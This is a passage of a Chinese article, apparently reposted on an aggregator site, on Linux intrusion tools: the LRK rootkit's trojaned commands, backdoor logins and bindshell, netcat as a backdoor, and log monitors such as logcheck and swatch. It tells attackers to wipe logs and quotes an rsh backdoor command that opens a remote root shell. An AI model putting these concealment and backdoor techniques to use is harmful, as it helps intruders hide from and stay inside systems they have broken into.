從上面我們可以看到,在安裝了Tcp_wrapper的主機(jī)上,系統(tǒng)的每一次連接,Tcp_wrapper都做了紀(jì)錄,它的內(nèi)容包括時(shí)間、服務(wù)、狀態(tài)、ip等,對(duì)攻擊這有很大的參考價(jià)值,不過(guò),一定要記得清除日志了。
(3)rootkit工具:LRK
Rootkit出現(xiàn)于二十世紀(jì)90年代初,它是攻擊者用來(lái)隱藏自己的蹤跡和保留root訪問(wèn)權(quán)限的工具。通常,攻擊者通過(guò)遠(yuǎn)程攻擊或者密碼猜測(cè)獲得系統(tǒng)的訪問(wèn)權(quán)限。接著,攻擊者會(huì)在侵入的主機(jī)中安裝rootkit,然后他會(huì)通過(guò)rootkit的后門(mén)檢查系統(tǒng),看是否有其他的用戶登錄,如果只有自己,攻擊者就開(kāi)始著手清理日志中的有關(guān)信息。通過(guò)rootkit的嗅探器獲得其它系統(tǒng)的用戶和密碼之后,攻擊者就會(huì)利用這些信息侵入其它的系統(tǒng)。
如果攻擊者能夠正確地安裝rootkit并合理地清理了日志文件,系統(tǒng)管理員就會(huì)很難察覺(jué)系統(tǒng)已經(jīng)被侵入,直到某一天其它系統(tǒng)的管理員和他聯(lián)系或者嗅探器的日志把磁盤(pán)全部填滿,他才會(huì)察覺(jué)已經(jīng)大禍臨頭了。不過(guò),在系統(tǒng)恢復(fù)和清理過(guò)程中,大多數(shù)常用的命令例如ps、df和ls已經(jīng)不可信了。許多rootkit中有一個(gè)叫做FIX的程序,在安裝rootkit之前,攻擊者可以首先使用這個(gè)程序做一個(gè)系統(tǒng)二進(jìn)制代碼的快照,然后再安裝替代程序。FIX能夠根據(jù)原來(lái)的程序偽造替代程序的三個(gè)時(shí)間戳(atime、ctime、mtime)、date、permission、所屬用戶和所屬用戶組。如果攻擊者能夠準(zhǔn)確地使用這些優(yōu)秀的應(yīng)用程序,并且在安裝rootkit時(shí)行為謹(jǐn)慎,就會(huì)讓系統(tǒng)管理員很難發(fā)現(xiàn)。
下面我們介紹一個(gè)非常典型的針對(duì)Linux系統(tǒng)的LRK版本6。Linux Rootkit 6是一個(gè)開(kāi)放源碼的rootkit,經(jīng)過(guò)多年的發(fā)展,Linux Rootkit的功能越來(lái)越完善,具有的特征也越來(lái)越多。下面我們簡(jiǎn)單地介紹一下Linux Rootkit包含的各種工具。
首先是隱藏入侵者行蹤的程序。為了隱藏入侵者的行蹤,Linux Rootkit IV的作者可謂煞費(fèi)心機(jī),編寫(xiě)了許多系統(tǒng)命令的替代程序,使用這些程序代替原由的系統(tǒng)命令,來(lái)隱藏入侵者的行蹤。這些程序包括:
[tr=#ffffff][td]ls、find、du[/td][td]這些程序會(huì)阻止顯示入侵者的文件以及計(jì)算入侵者文件占用的空間。在編譯之前,入侵者可以通過(guò)ROOTKIT_FILES_FILE設(shè)置自己的文件所處的位置,默認(rèn)是/dev/ptyr。注意如果在編譯時(shí)使用了SHOWFLAG選項(xiàng),就可以使用ls -/命令列出所有的文件。這幾個(gè)程序還能夠自動(dòng)隱藏所有名字為:ptyr、hack.dir和W4r3z的文件。[/td][/tr][tr=#ffffff][td]ps、top、pidof[/td][td]這幾個(gè)程序用來(lái)隱藏所有和入侵者相關(guān)的進(jìn)程。[/td][/tr][tr=#ffffff][td]netstat[/td][td]隱藏出/入指定IP地址或者端口的網(wǎng)絡(luò)數(shù)據(jù)流量程。[/td][/tr][tr=#ffffff][td]killall[/td][td]不會(huì)殺死被入侵者隱藏的進(jìn)程。[/td][/tr][tr=#ffffff][td]ifconfig[/td][td]如果入侵者啟動(dòng)了嗅探器,這個(gè)程序就阻止PROMISC標(biāo)記的顯示,使系統(tǒng)管理員難以發(fā)現(xiàn)網(wǎng)絡(luò)接口已經(jīng)處于混雜模式下。[/td][/tr][tr=#ffffff][td]crontab[/td][td]隱藏有關(guān)攻擊者的crontab條目。[/td][/tr][tr=#ffffff][td]tcpd[/td][td]阻止向日志中記錄某些連接。[/td][/tr][tr=#ffffff][td]syslogd [/td][td]過(guò)濾掉日志中的某些連接信息。[/td][/tr]
其次是后門(mén)程序。木馬程序可以為本地用戶提供后門(mén);木馬網(wǎng)絡(luò)監(jiān)控程序則可以為遠(yuǎn)程用戶提供inetd、rsh、ssh等后門(mén)服務(wù),具體因版本而異。隨著版本的升級(jí),Linux Rootkit IV的功能也越來(lái)越強(qiáng)大,特征也越來(lái)越豐富。一般包括如下網(wǎng)絡(luò)服務(wù)程序:
[tr=#ffffff][td]chfn[/td][td]提升本地普通用戶權(quán)限的程序。運(yùn)行chfn,在它提示輸入新的用戶名時(shí),如果用戶輸入rookit密碼,他的權(quán)限就被提升為root。[/td][/tr][tr=#ffffff][td]chsh[/td][td]提升本地用戶權(quán)限的程序。運(yùn)行chsh,在它提示輸入新的shell時(shí),如果用戶輸入rootkit密碼,他的權(quán)限就被提升為root。[/td][/tr][tr=#ffffff][td]passwd[/td][td]和上面兩個(gè)程序的作用相同。在提示你輸入新密碼時(shí),如果輸入rookit密碼,權(quán)限就可以變成root。[/td][/tr][tr=#ffffff][td]login [/td][td]允許使用任何帳戶通過(guò)rootkit密碼登錄。如果使用root帳戶登錄被拒絕,可以嘗試一下rewt。當(dāng)使用后門(mén)時(shí),這個(gè)程序還能夠禁止記錄命令的歷史記錄。[/td][/tr][tr=#ffffff][td]inetd[/td][td]特洛伊inetd程序,為攻擊者提供遠(yuǎn)程訪問(wèn)服務(wù)。[/td][/tr][tr=#ffffff][td]rshd[/td][td]為攻擊者提供遠(yuǎn)程shell服務(wù)。攻擊者使用rsh -l rootkitpassword host command命令就可以啟動(dòng)一個(gè)遠(yuǎn)程root shell。[/td][/tr][tr=#ffffff][td]sshd[/td][td]為攻擊者提供ssh服務(wù)的后門(mén)程序。[/td][/tr]
再就是工具程序。所有不屬于以上類(lèi)型的程序都可以歸如這個(gè)類(lèi)型,它們實(shí)現(xiàn)一些諸如:日志清理、報(bào)文嗅探以及遠(yuǎn)程shell的端口綁定等功能,包括:
[tr=#ffffff][td]fix[/td][td]文件屬性偽造程序。[/td][/tr][tr=#ffffff][td]linsniffer[/td][td]報(bào)文嗅探器程序。[/td][/tr][tr=#ffffff][td]sniffchk[/td][td]一個(gè)簡(jiǎn)單的bash shell腳本,檢查系統(tǒng)中是否正有一個(gè)嗅探器在運(yùn)行。[/td][/tr][tr=#ffffff][td]login [/td][td]允許使用任何帳戶通過(guò)rootkit密碼登錄。如果使用root帳戶登錄被拒絕,可以嘗試一下rewt。當(dāng)使用后門(mén)時(shí),這個(gè)程序還能夠禁止記錄命令的歷史記錄。[/td][/tr][tr=#ffffff][td]z2 [/td][td]utmp/wtmp/lastlog日志清理工具。可以刪除utmp/wtmp/lastlog日志文件中有關(guān)某個(gè)用戶名的所有條目。不過(guò),如果用于Linux系統(tǒng)需要手工修改其源代碼,設(shè)置日志文件的位置。[/td][/tr][tr=#ffffff][td]bindshell[/td][td]在某個(gè)端口上綁定shell服務(wù),默認(rèn)端口是12497。為遠(yuǎn)程攻擊者提供shell服務(wù)。[/td][/tr]
(4)netcat
這是一個(gè)簡(jiǎn)單而有用的工具,能夠通過(guò)使用TCP或UDP協(xié)議的網(wǎng)絡(luò)連接去讀寫(xiě)數(shù)據(jù)。它被設(shè)計(jì)成一個(gè)穩(wěn)定的后門(mén)工具,能夠直接由其它程序和腳本輕松驅(qū)動(dòng)。同時(shí),它也是一個(gè)功能強(qiáng)大的網(wǎng)絡(luò)調(diào)試和探測(cè)工具,能夠建立你需要的幾乎所有類(lèi)型的網(wǎng)絡(luò)連接,還有幾個(gè)很有意思的內(nèi)置功能。 2、查找Linux下的蛛絲馬跡:日志工具
對(duì)于高明的攻擊者來(lái)說(shuō),進(jìn)入系統(tǒng)后,還應(yīng)了解自己的“蛛絲馬跡”并清除這些痕跡,自然就要了解一些日志工具了。
(1)logcheck
logchek 可以自動(dòng)地檢查日志文件,定期檢查日志文件以發(fā)現(xiàn)違反安全規(guī)則以及異常的活動(dòng)。它先把正常的日志信息剔除掉,把一些有問(wèn)題的日志保留下來(lái),然后把這些信息 email 給系統(tǒng)管理員。logcheck 用 logtail 程序記住上次已經(jīng)讀過(guò)的日志文件的位置,然后從這個(gè)位置開(kāi)始處理新的日志信息。logcheck 主要由下面幾個(gè)主要的文件:
[tr=#ffffff][td=1,1,159]logcheck.sh[/td][td=1,1,322]可執(zhí)行的腳本文件,記錄logcheck檢查那些日志文件等,我們可以把它加入crontab中定時(shí)運(yùn)行。[/td][/tr][tr=#ffffff][td=1,1,159]logcheck.hacking[/td][td=1,1,322]是logcheck 檢查的模式文件。和下面的文件一起,按從上到下的順序執(zhí)行。這個(gè)文件表明了入侵活動(dòng)的模式。[/td][/tr][tr=#ffffff][td=1,1,159]logcheck.violations[/td][td=1,1,322]這個(gè)文件表示有問(wèn)題,違背常理的活動(dòng)的模式。優(yōu)先級(jí)小于上面的那個(gè)模式文件。[/td][/tr][tr=#ffffff][td=1,1,159]logcheck.violations
.ignore[/td][td=1,1,322]這個(gè)文件和上面的logcheck.violations的優(yōu)先是相對(duì)的,是我們所不關(guān)心的問(wèn)題的模式文件。[/td][/tr][tr=#ffffff][td=1,1,159]logcheck.ignore[/td][td=1,1,322]這是檢查的最后一個(gè)模式文件。如果沒(méi)有和前三個(gè)模式文件匹配,也沒(méi)有匹配這個(gè)模式文件的話,則輸出到報(bào)告中。[/td][/tr][tr=#ffffff][td=1,1,159]Logtail[/td][td=1,1,322]記錄日志文件信息。[/td][/tr]Logcheck首次運(yùn)行時(shí)讀入相關(guān)的日志文件的所有內(nèi)容,Logtail會(huì)在日志文件的目錄下為每個(gè)關(guān)心的日志文件建立一個(gè)logfile.offset 的偏移量文件,以便于下次檢查時(shí)從這個(gè)偏移量開(kāi)始檢查。Logcheck執(zhí)行時(shí),將未被忽略的內(nèi)容通過(guò)郵件的形式發(fā)送給 logcheck.sh 中 系統(tǒng)管理員指定的用戶。
(2)logrotate
一般Linux 發(fā)行版中都自帶這個(gè)工具。它可以自動(dòng)使日志循環(huán),刪除保存最久的日志,它的配置文件是 /etc/logrotate.conf,我們可以在這個(gè)文件中設(shè)置日志的循環(huán)周期、日志的備份數(shù)目以及如何備份日志等等。在/etc/logrotate.d目錄下,包括一些工具的日志循環(huán)設(shè)置文件,如syslog等,在這些文件中指定了如何根據(jù)/etc/logrotate.conf做日志循環(huán),也可以在這里面添加其他的文件以循環(huán)其他服務(wù)的日志。
(3)swatch
swatch 是一個(gè)實(shí)時(shí)的日志監(jiān)控工具,我們可以設(shè)置感興趣的事件。Swatch 有兩種運(yùn)行方式:一種可以在檢查日志完畢退出,另一種可以連續(xù)監(jiān)視日志中的新信息。Swatch提供了許多通知方式,包括email、振鈴、終端輸出、多種顏色等等。安裝前,必須確保系統(tǒng)支持perl。swatch 軟件的重點(diǎn)是配置文件swatchmessage,這個(gè)文本文件告訴 swatch 需要監(jiān)視什么日志,需要尋找什么觸發(fā)器,和當(dāng)觸發(fā)時(shí)所要執(zhí)行的動(dòng)作。當(dāng)swatch發(fā)現(xiàn)與swatchmessage中定義的觸發(fā)器正則表達(dá)式相符時(shí),它將執(zhí)行在 swatchrc中定義的通知程序。
當(dāng)然,上面所介紹的軟件只是Linux大海中的幾只美麗的貝殼,隨著越來(lái)越多的用戶加入到Linux大軍中,我們相信,優(yōu)秀的Hack也將越來(lái)越多,這反過(guò)來(lái)也將促進(jìn)Linux操作系統(tǒng)逐步走向成熟,我們拭目以待
總結(jié)
以上是生活随笔為你收集整理的黑客实战之攻击篇——用NC打造成自己的简单后门的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問(wèn)題。
- 上一篇: ubuntu16.04:制作gif图片
- 下一篇: 计算机会计电算化与实训报告,【会计电算化